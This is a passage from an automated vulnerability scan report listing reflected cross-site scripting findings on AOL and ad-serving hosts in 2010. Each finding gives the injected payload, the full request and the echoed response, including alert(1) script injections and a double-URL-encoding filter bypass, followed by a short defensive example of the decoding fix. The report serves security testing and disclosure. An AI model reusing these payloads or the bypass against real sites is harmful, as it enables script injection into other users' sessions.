s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetworkd9bfc";c758afbe8ca";
s_265.prop2="aol_pp";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.3. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/aolcom_terms

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b6e0"%3b62d3162371a was submitted in the REST URL parameter 1. This input was echoed as 5b6e0";62d3162371a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork5b6e0"%3b62d3162371a/aolcom_terms HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.1124666368; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:38 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10547
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork5b6e0";62d3162371a";
s_265.prop2="aolcom_terms";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.4. http://about.aol.com/aolnetwork/copyright_infringement [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/copyright_infringement

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 866c5"%3bc2c3419ad15 was submitted in the REST URL parameter 1. This input was echoed as 866c5";c2c3419ad15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork866c5"%3bc2c3419ad15/copyright_infringement HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.2198408192; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:40 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10567
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork866c5";c2c3419ad15";
s_265.prop2="copyright_infringement";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.5. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://about.aol.com
Path:   /aolnetwork/trademarks

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43ebc"%3b89a48e93d80 was submitted in the REST URL parameter 1. This input was echoed as 43ebc";89a48e93d80 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aolnetwork43ebc"%3b89a48e93d80/trademarks HTTP/1.1
Host: about.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=1523306440.1441850444.269028352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Fri, 19 Nov 2010 23:38:36 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 10541
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ln31 -->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<!--
s_265.server="acp-ln31.websys.aol.com";
s_265.mmxgo=false;
s_265.pageName="abt : Page Not Found";
s_265.trackExternalLinks="true";
s_265.channel="us.about";
s_265.prop1="aolnetwork43ebc";89a48e93d80";
s_265.prop2="trademarks";
s_265.disablepihost=false;
s_265.pfxID="abt";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

2.6. https://account.login.aol.com/opr/_cqr/opr/opr.psp [authLev parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://account.login.aol.com
Path:   /opr/_cqr/opr/opr.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83291%2522%253b5bb1d8c030d was submitted in the authLev parameter. This input was echoed as 83291";5bb1d8c030d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the authLev request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
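The bypass in 2.6 is an ordering bug rather than a missing filter: the web server decodes the query string once, the application's character filter runs on that result, and the application then decodes a second time, producing the quote after validation has already passed. The block below is an added example, not code from the report or from the AOL login service. It models the three pipelines using the report's own authLev payload: the inferred vulnerable order, the fix the remediation text prefers (no second decode), and the fallback it allows (validate after the last decode). Function names and the blocked-character set are constructed.

```python
from urllib.parse import unquote

# Characters the application appears to block (the report says "certain
# characters that are often used in XSS attacks"); the exact set is an assumption.
BLOCKED = set('<>"\'')


def has_blocked(value: str) -> bool:
    return any(c in BLOCKED for c in value)


def pipeline_vulnerable(raw: str):
    """Inferred order from 2.6: server decode -> filter -> application decode.
    Returns the value that reaches the script block, or None if rejected."""
    once = unquote(raw)          # web server's single URL-decode
    if has_blocked(once):
        return None
    return unquote(once)         # application's redundant second decode


def pipeline_no_second_decode(raw: str):
    """Preferred fix: the server already decoded, so the application must not
    decode again. The filter now sees the canonical value."""
    once = unquote(raw)
    if has_blocked(once):
        return None
    return once


def pipeline_validate_after_decode(raw: str):
    """If the application insists on its own canonicalisation, validation has
    to run on the final form, after every decode step."""
    final = unquote(unquote(raw))
    if has_blocked(final):
        return None
    return final


if __name__ == "__main__":
    payload = "083291%2522%253b5bb1d8c030d"      # from the 2.6 request
    print(pipeline_vulnerable(payload))           # 083291";5bb1d8c030d reaches the page
    print(pipeline_no_second_decode(payload))     # 083291%22%3b5bb1d8c030d, harmless text
    print(pipeline_validate_after_decode(payload))  # None, rejected
```

The same check generalises to any layered decoder (URL, HTML entity, Unicode normalisation): enumerate every transformation applied between receipt and output and confirm validation is the last step, not one in the middle.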

Request

GET /opr/_cqr/opr/opr.psp?sitedomain=sns.webmail.aol.com&authLev=083291%2522%253b5bb1d8c030d&siteState=ver%3A4%7Crt%3ASTANDARD%7Cat%3ASNS%7Cld%3Awebmail.aol.com%7Cuv%3AAOL%7Clc%3Aen-us%7Cmt%3AAOL%7Csnt%3AScreenName%7Csid%3Ab8f0c4b0-0c85-446d-b863-b15687c1024d&lang=en&locale=us&offerId=newmail-en-us-v2&seamless=novl HTTP/1.1
Host: account.login.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.0 200 OK
Date: Fri, 19 Nov 2010 23:39:11 GMT
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: OPR_SC=diAxLjAga2lkIDAgUWtnaFZheXBieUMzVFM2TUwrK29JaTIzd1pRPQ%3D%3D-NcFbxVvZ3cH4d3%2Bx%2BogHkrjcziFFwz%2Bb; Domain=account.login.aol.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 2920
Connection: close



...[SNIP]...
fxID="sso";
s_265.pageName="sso : badbrowser";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/opr/badbrowser.jsp";
s_265.prop15="bm9uZQ%3D%3D";
s_265.prop17="std";
s_265.prop18="083291";5bb1d8c030d";
s_265.prop19="wa3";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
var s_code=s_265.t();
if(s_code)document.write(s_code);
//-->
...[SNIP]...

2.7. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=317!

Issue detail

The value of the clk0 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5546"%3balert(1)//a772291970e was submitted in the clk0 parameter. This input was echoed as b5546";alert(1)//a772291970e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=317!?che=3133643&clk0=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a57/7/13d/%2a/l%3B228278285%3B0-0%3B0%3B56591511%3B4307-300/250%3B38141576/38159333/1%3B%3B%7Esscs%3D%3fhttp://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=http://ad.vulnerable.ad.partner/clk;228265252;52145443;b?b5546"%3balert(1)//a772291970e&ct=US&st=TX&ac=713&zp=77002&bw=4&dma=99&city=13248 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerable.verizon.host/adi/rmm.msnbc/carvingboard_300x250_c;sz=300x250;ord=183876105?click=http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.aggregateknowledge.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=78036424337708989; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Wed, 18-Nov-2015 23:32:52 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BApXXOQAAAAAAAEAPgEAVgEA9wEQAAEAEwECkW5AAQA%2Bfg4BrSfwIIQgAAAAAAAAASAAAAAAAAAA9wAAAAAAAABWAOAAAA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Sun, 18-Nov-2012 23:32:52 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 19 Nov 2010 23:32:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01?href=http://ad.doubleclick.net/clk;228265252;52145443;b?b5546";alert(1)//a772291970ehttp://ad.aggregateknowledge.com/interaction!che=1390802481?imid=1009278178551694368&ipid=288&caid=62&cgid=86&crid=247&a=CLICK&adid=224&status=0&l=http%3A%2F%2Fbricks.coupons.com%2Fstart.asp%3Ftqnm%3Dz
...[SNIP]...

2.8. http://ad.aggregateknowledge.com/iframe!t=317! [clk0 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.aggregateknowledge.com
Path:   /iframe!t=317!

Issue detail

The value of the clk0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f766a"><script>alert(1)</script>38e82e8f2db was submitted in the clk0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=317!?che=3133643&clk0=http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a57/7/13d/%2a/l%3B228278285%3B0-0%3B0%3B56591511%3B4307-300/250%3B38141576/38159333/1%3B%3B%7Esscs%3D%3fhttp://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=http://ad.vulnerable.ad.partner/clk;228265252;52145443;b?f766a"><script>alert(1)</script>38e82e8f2db&ct=US&st=TX&ac=713&zp=77002&bw=4&dma=99&city=13248 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerable.verizon.host/adi/rmm.msnbc/carvingboard_300x250_c;sz=300x250;ord=183876105?click=http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.aggregateknowledge.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=652248541896494258; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Wed, 18-Nov-2015 23:32:52 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0BApXXOQAAAAAAAEAPgEAVgEA9wEQAAEAEwECkW5AAQA%2BfnqetjsJ49hvAAAAAAAAASAAAAAAAAAA9wAAAAAAAABWAOAAAA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Sun, 18-Nov-2012 23:32:52 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Fri, 19 Nov 2010 23:32:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01?href=http://ad.doubleclick.net/clk;228265252;52145443;b?f766a"><script>alert(1)</script>38e82e8f2dbhttp://ad.aggregateknowledge.com/interaction!che=986665669?imid=8835699883632744559&ipid=288&caid=62&cgid=86&crid=247&a=CLICK&adid=224&status=0&l=http%3A%2F%2Fbricks.coupons.com%2Fstart.asp%3Ftqnm%3Dzj
...[SNIP]...

2.9. http://vulnerable.verizon.host/adi/N2883.158901.DATAXU.COM/B4947916 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N2883.158901.DATAXU.COM/B4947916

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d29'-alert(1)-'825c464d51d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2883.158901.DATAXU.COM/B4947916;sz=69d29'-alert(1)-'825c464d51d HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://cdn.w55c.net/i/0Rm4TKIov5_418275004.html?rtbhost=174.36.140.30&btid=NWI2MDdjZDQ3MDdjZDE3YmEyZTJhYjAzZWE4NjU4MWQ0MWRjMDAzZnxkNzE0ZTYxYS01MjFmLTQ0MGYtOGNjMS1kMGZkM2E4OWViZGN8MTI5MDM1MTU5OTM1N3wxfDBGM3o2U0RnY1N8MFJtNFRLSW92NXw1ODU4MDljNS0yOGM1LTQ4NDgtYTk5Yy03ZjRmOTIzN2YwNzc&ei=RUBICON&wp_exchange=13BB115E7425D128&euid=MDU2NThmMzEyMjJkNjQ2OWJhNDcxZWI4ZmQ5NGM1ZjZhODcyNjE0NQ&slotid=MQ&fiu=MEYzejZTRGdjUw&ciu=MFJtNFRLSW92NQ&reqid=NWI2MDdjZDQ3MDdjZDE3YmEyZTJhYjAzZWE4NjU4MWQ0MWRjMDAzZg&ccw=SUFCMjQjMC4w&epid=&bp=5500&dv=&dm=&os=&scres=&gen=&age=&zc=NzcwMDI&s=http%3A%2F%2Fadserver.adtechus.com%2Fadiframe%2F3.0%2F5235%2F1131606%2F0%2F154%2FADTECH%3Bcookie%3Dinfo%3Btarget%3D_blank%3Bkey%3Dkey1%2Bkey2%2Bkey3%2Bkey4%3Bgrp%3D000001&refurl=
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: vulnerable.verizon.host
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: id=c8e26c52e00001b|690327/426441/14933,2760581/556004/14933,2579983/257817/14932,2656259/943985/14932,2881371/1000549/14932,2761768/953351/14932|t=1290036089|et=730|cs=cudexktl

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 31682
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 21 Nov 2010 15:00:17 GMT
Expires: Sun, 21 Nov 2010 15:00:17 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects)
...[SNIP]...
g=1;v=1;pid=55638658;aid=231616750;ko=0;cid=34790382;rid=34808260;rv=1;rn=4921510;";
this.swfParams = 'sid=964168&aid=231616750&cid=34790382&pid=55638658&src=1762894&rv=1&rid=34808260&=69d29'-alert(1)-'825c464d51d&';
this.renderingId = "34808260";
this.previewMode = (("%PreviewMode" == "true") ? true : false);
this.debugEventsMode = (("%DebugEventsMode" == "true")
...[SNIP]...

2.10. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3405.Sympatico.ca/B5011284.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ebe8"-alert(1)-"51601b54316 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6974

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
e=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=&6ebe8"-alert(1)-"51601b54316=1http%3a%2f%2frbc.bridgetrack.com/bank/_redir.htm%3FBTData%3D6021A7B776679675D54424BB7A2A5AFA09E9D9F81FEFBF8F3F4C2A01B149%26BT_TRF%3D11030%26ASC%3DAD0028");
var fscUrl = url;
var fscUrlClickTagFound
...[SNIP]...

2.11. http://vulnerable.verizon.host/adi/N3405.Sympatico.ca/B5011284.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.verizon.host
Path:   /adi/N3405.Sympatico.ca/B5011284.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e0da"-alert(1)-"8fdfe6c6257 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3405.Sympatico.ca/B5011284.3;sz=728x90;ord=195270203?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=http://clk.redcated/goiframe/191227999.191250938/164327256/direct/01%3fhref=6e0da"-alert(1)-"8fdfe6c6257 HTTP/1.1
Host: vulnerable.verizon.host
Proxy-Connection: keep-alive
Referer: http://redcated/D21/iview/164327256/direct;wi.728;hi.90/01/8450819519?click=http://bellcan.adbureau.net/accipiter/adclick/CID=0000054a95554fdf00000000/vibe=1/AAMSZ=728x90/SITE=ENSYMP.NEWS/AAMGNRC1=AdManagerResponse/area=HUBPAGE/ACC_RANDOM=8450819519/pageid=5839294491/relocate=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=228ef07ef3000058|2148193/710316/14932,2284052/769449/14932,2687966/927840/14932,865138/548417/14932,1359940/510872/14932,2530996/887296/14932,2579983/399676/14932,2624219/617185/14928,189445/48295/14926,1393346/903624/14921,2384669/984905/14921,2676521/1030425/14921,2199899/552974/14921,1359549/451737/14921,2587594/917522/14921,1886972/1005586/14921,1559855/505298/14921,1139856/361192/14920,1319645/370076/14920,2761768/958300/14920,2569617/889517/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:02 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6899

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
